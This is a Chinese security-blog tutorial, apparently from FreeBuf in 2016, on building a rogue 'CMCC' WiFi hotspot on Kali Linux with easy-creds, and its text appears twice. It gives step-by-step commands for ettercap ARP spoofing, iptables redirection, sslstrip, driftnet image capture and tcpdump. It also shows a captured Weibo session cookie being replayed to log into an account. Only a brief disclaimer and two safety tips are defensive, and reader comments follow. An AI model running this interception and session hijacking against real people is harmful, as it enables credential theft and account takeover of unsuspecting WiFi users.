揭秘:攻击者如何在Kali Linux中搭建钓鱼热点 20160720
2016-07-21 12:36
1801 查看
作者:雪碧0xroot@漏洞盒子安全团队
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!
操作系统:Kali 1.0 (VM)
FackAP: easy-creds
硬件:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱)
靶机:安卓、iPhone设备
这一步设定easy-creds的安装目录:/opt ,安装过程中会从国外网站下载一些依赖包以及第三方软件,这一过程中建议通过翻墙来节省时间。
当看到提示happy hunting的时候便意味着安装完成了:
根据上述步骤已将easy-creds安装到Kali中,我们可以在终端执行easy-creds运行,接下来我们需要对软件、系统参数进行一些修改:
kali中自带了中间人攻击的一些工具,如:ettercap,在第一次使用ettercap时,我们需要修改其默认配置文件/etc/ettercap/etter.conf: (有的系统中,ettercap的配置文件路径为:/etc/etter.conf)
需要我们把ettercap的ec_uid、ec_gid的值修改为0:以系统最高权限运行。
另外,如果系统使用了iptables防火墙,还需取消#后的注释使iptables配置生效,将:
修改为:
将managed=false修改为managed=true:
重启网络管理服务:
终端执行:easy-creds
选择第三项:FakeAP Attacks
选择第一项:FakeAP Attack Static
y确定包含sidejacking劫持攻击:
下一步选择WIFI网络的流量入口:eth0
选择无线网络接口&设备:wlan0
设定WIFI-SSID:CMCC
WIFI网络信道:5
mon0
n
at0
n
为无线网络设置网段:192.168.88.0/24
设定DNS服务器:8.8.8.8
完成之后,easy-creds启动了Airbase-NG、DMESG、SSLStrip、Ettercap tunnel、URL snarf、Dsniff等工具:
红色部分显示安卓、iPhone靶机成功连入钓鱼WIFI环境,URL snarf也捕获到了两台设备正在访问的网站网址等信息。
driftnet是一款简单而使用的图片捕获工具,能够捕获到网络数据包中的图片,同时支持抓取和显示音频文件,可用于捕获微信朋友圈中的相片、微博配图等等。
Ettercap利用ARP欺骗,监听同一网段内某台主机甚至所有主机的网络通信流量,抓取其它主机通信流量中的Cookie等信息:
利用Cookie前,我们需要下载浏览器的一些Cookie相关的插件,如cookie manager、cookie editor。
这里我使用了:Modify Headers for Google Chrome
选择右上角+ 增加Cookie:
捕获HTTPS通信传输中的账号、密码:
1.easy-creds生成的日志文件过大,建议在/tmp目录中启动easy-creds(即使忘了删easy-creds日志,系统重启后自动清空/tmp目录)
2.如果连入钓鱼热点的设备不能联网了及时检查:/proc/sys/net/ipv4/ip_forward
当发现值为0的时候需再次执行:
3.easy-creds目前不兼容kali 2.0,所以不建议在kali 2.0 系统中安装easy-creds;
4.目前测试easy-creds只支持移动设备接入WIFI,测试过程中发现笔记本(win 7)接入WIFI不能联网。
1.不随便连陌生 WIFI,及时注销登录状态可使Cookie时效;
2.不使用WIFI时及时关闭手机WIFI,避免自动连入诸如CMCC这一类的公共开放无线热点。
Ettercap Man In The MIddle Attack + SSL Strip
*本文作者:雪碧0xroot@漏洞盒子安全团队,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)
收藏该文
漏洞盒子
59篇文章等级:6级
互联网安全测试平台
个人主页 发私信
上一篇:使用GnuRadio
+ OpenLTE + SDR 搭建4G LTE 基站(上)
下一篇:本篇已是最新文章
发表评论
legendsec (4级) 2016-07-20回复1楼
http://www.freebuf.com/articles/wireless/69840.html
这个呢?
亮了(4)
flyflying (1级) 2016-07-20回复2楼
最近一直在搭建WiFi热点,但是我测试了各种工具,在我的kali上几乎都有问题
亮了(1)
woshi打酱油的 (1级)带着酱油瓶飘过,就看看 2016-07-20回复3楼
感觉不错的样子
亮了(0)
ee 2016-07-20回复4楼
内容太初级
亮了(2)
jason_zhang (1级) 2016-07-20回复5楼
666
亮了(0)
小贝拉_ 2016-07-20回复6楼
我忘了带话题
亮了(0)
漏洞兔子 2016-07-20回复7楼
转发微博
亮了(0)
lx277856602 (2级) 2016-07-20回复8楼
mark
亮了(0)
HappyQQ 2016-07-20回复9楼
转发微博
亮了(0)
Error404 (1级) 2016-07-20回复10楼
create_ap + tcpdomp + ferret
亮了(0)
pure (1级) 2016-07-20回复11楼
学习了,适合新手学习
亮了(0)
_Black-Hole_ 2016-07-20回复12楼
碧儿牛逼
亮了(1)
追影人 (4级)weibo.cn/KOshadow 2016-07-20回复13楼
路边的wifi不要连
亮了(0)
fb 2016-07-20回复14楼
超级无敌老东西。。。。。。
亮了(0)
Scales (1级) 2016-07-20回复15楼
每次弄都会出现问题
亮了(0)
楚汉狂子 2016-07-21回复16楼
可惜不支持2.0的版本
亮了(0)
taylorwin (5级) 2016-07-21回复17楼
貌似有一键部署的,
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!
0×00 实验环境
操作系统:Kali 1.0 (VM)FackAP: easy-creds
硬件:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱)
靶机:安卓、iPhone设备
0×01 环境搭建
git clone https://github.com/brav0hax/easy-creds cd easy-creds
bash install.sh
选择第一项:1. Debian/Ubuntu and derivatives
这一步设定easy-creds的安装目录:/opt ,安装过程中会从国外网站下载一些依赖包以及第三方软件,这一过程中建议通过翻墙来节省时间。
当看到提示happy hunting的时候便意味着安装完成了:
0×02
根据上述步骤已将easy-creds安装到Kali中,我们可以在终端执行easy-creds运行,接下来我们需要对软件、系统参数进行一些修改:
2.1 修改etter uid、gid值 &开启iptables端口转发
kali中自带了中间人攻击的一些工具,如:ettercap,在第一次使用ettercap时,我们需要修改其默认配置文件/etc/ettercap/etter.conf: (有的系统中,ettercap的配置文件路径为:/etc/etter.conf)需要我们把ettercap的ec_uid、ec_gid的值修改为0:以系统最高权限运行。
另外,如果系统使用了iptables防火墙,还需取消#后的注释使iptables配置生效,将:
# if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
修改为:
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
2.2 开启ipv4数据包转发:
echo 1 >> /proc/sys/net/ipv4/ip_forward
2.3 配置iptables规则:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2.4 运行sslstrip
sslstrip -l 8080
2.5 开启网络管理 &重启网络管理服务
vim /etc/NetworkManager/NetworkManager.conf
重启网络管理服务:
service network-manager restart
0×03 运行easy-creds
终端执行:easy-creds 选择第三项:FakeAP Attacks
选择第一项:FakeAP Attack Static
y确定包含sidejacking劫持攻击:
下一步选择WIFI网络的流量入口:eth0
选择无线网络接口&设备:wlan0
设定WIFI-SSID:CMCC
WIFI网络信道:5
mon0
n
at0
n
为无线网络设置网段:192.168.88.0/24
设定DNS服务器:8.8.8.8
完成之后,easy-creds启动了Airbase-NG、DMESG、SSLStrip、Ettercap tunnel、URL snarf、Dsniff等工具:
红色部分显示安卓、iPhone靶机成功连入钓鱼WIFI环境,URL snarf也捕获到了两台设备正在访问的网站网址等信息。
0×04 Hacking for fun
4.1 “绵羊墙”
driftnet是一款简单而使用的图片捕获工具,能够捕获到网络数据包中的图片,同时支持抓取和显示音频文件,可用于捕获微信朋友圈中的相片、微博配图等等。driftnet -i at0 (-i指定监听的网络接口)
4.2 MITM中间人攻击
Ettercap利用ARP欺骗,监听同一网段内某台主机甚至所有主机的网络通信流量,抓取其它主机通信流量中的Cookie等信息:ettercap -i at0 -T -M arp:remote /192.168.88.1/ // (通过ARP欺骗,监听192.168.88.0/24 网段所有主机通信流量)
4.3 利用Cookie登陆受害者账户
利用Cookie前,我们需要下载浏览器的一些Cookie相关的插件,如cookie manager、cookie editor。这里我使用了:Modify Headers for Google Chrome
4.3.1 捕获到的微博Cookie数据:
Wed Jul 20 11:27:50 2016 TCP 192.168.88.100:50664 --> 180.149.139.248:80 | AP GET /unread?t=1468985586846 HTTP/1.1. Host: m.weibo.cn. Connection: keep-alive. User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.19.815 Mobile. Cookie: H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U. Accept: application/json, text/javascript, */*; q=0.01. X-Requested-With: XMLHttpRequest. Accept-Language: zh-cn. Referer: http://m.weibo.cn/. Accept-Encoding: gzip,deflate. .
4.3.2 清空浏览器内weibo.cn的Cookie:
4.3.3 导入微博Cookie
选择右上角+ 增加Cookie:Action=Modify
Name=Cookie
Value=H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.
4.3.4 访问m.weibo.cn:
0×05 嗅探数据包&协议分析
5.1 wireshark
5.2 tcpdump
tcpdump -i at0 -w sniffe.dump
5.3 ssltrips嗅探https加密流量
捕获HTTPS通信传输中的账号、密码:iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
ssltrips -p -l 8080 -w log.txt
0×06 注意事项
1.easy-creds生成的日志文件过大,建议在/tmp目录中启动easy-creds(即使忘了删easy-creds日志,系统重启后自动清空/tmp目录)2.如果连入钓鱼热点的设备不能联网了及时检查:/proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
当发现值为0的时候需再次执行:
echo 1 >> /proc/sys/net/ipv4/ip_forward
3.easy-creds目前不兼容kali 2.0,所以不建议在kali 2.0 系统中安装easy-creds;
4.目前测试easy-creds只支持移动设备接入WIFI,测试过程中发现笔记本(win 7)接入WIFI不能联网。
0×07 安全建议
1.不随便连陌生 WIFI,及时注销登录状态可使Cookie时效;2.不使用WIFI时及时关闭手机WIFI,避免自动连入诸如CMCC这一类的公共开放无线热点。
0×08 refer
Ettercap Man In The MIddle Attack + SSL Strip*本文作者:雪碧0xroot@漏洞盒子安全团队,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)
收藏该文
漏洞盒子
59篇文章等级:6级
互联网安全测试平台
个人主页 发私信
上一篇:使用GnuRadio
+ OpenLTE + SDR 搭建4G LTE 基站(上)
下一篇:本篇已是最新文章
发表评论
已有 17 条评论
legendsec (4级) 2016-07-20回复1楼
http://www.freebuf.com/articles/wireless/69840.html
这个呢?
亮了(4)
flyflying (1级) 2016-07-20回复2楼
最近一直在搭建WiFi热点,但是我测试了各种工具,在我的kali上几乎都有问题
亮了(1)
woshi打酱油的 (1级)带着酱油瓶飘过,就看看 2016-07-20回复3楼
感觉不错的样子
亮了(0)
ee 2016-07-20回复4楼
内容太初级
亮了(2)
jason_zhang (1级) 2016-07-20回复5楼
666
亮了(0)
小贝拉_ 2016-07-20回复6楼
我忘了带话题
亮了(0)
漏洞兔子 2016-07-20回复7楼
转发微博
亮了(0)
lx277856602 (2级) 2016-07-20回复8楼
mark
亮了(0)
HappyQQ 2016-07-20回复9楼
转发微博
亮了(0)
Error404 (1级) 2016-07-20回复10楼
create_ap + tcpdomp + ferret
亮了(0)
pure (1级) 2016-07-20回复11楼
学习了,适合新手学习
亮了(0)
_Black-Hole_ 2016-07-20回复12楼
碧儿牛逼
亮了(1)
追影人 (4级)weibo.cn/KOshadow 2016-07-20回复13楼
路边的wifi不要连
亮了(0)
fb 2016-07-20回复14楼
超级无敌老东西。。。。。。
亮了(0)
Scales (1级) 2016-07-20回复15楼
每次弄都会出现问题
亮了(0)
楚汉狂子 2016-07-21回复16楼
可惜不支持2.0的版本
亮了(0)
taylorwin (5级) 2016-07-21回复17楼
貌似有一键部署的,
相关文章推荐
- SELinux开启与关闭
- 小记——linux时间
- 每日一linux命令(35)-------top 命令
- linux中生成shh公用密匙的方法,和快捷配置。
- linux下修改时区(TIMEZONE)
- 纯新手向--Linux搭建SVN服务器
- linux--时间编程(5)
- Linux进程状态解析 之 R、S、D、T、Z、X (主要有三个状态)
- Linux 输入密码无法登陆
- linux等待队列wait_queue_head_t和wait_queue_t
- Linux下安装配置使用 Keepalived
- Linux常用命令之sed
- linux-3.0内核移植
- Linux 下安装 jdk-7u75-linux-x64.gz,jdk1.7.0_75,jdk1.7步骤:
- CentOS7下安装Chrome
- Linux 使用root用户FTP上传
- Linux系统编程--文件(三)
- Linux内存管理原理 与文件读写 图 相当详细
- 【新手出发】从搭虚拟机开始,一步一步在CentOS上跑起来.Net Core程序
- linux make: **** 报错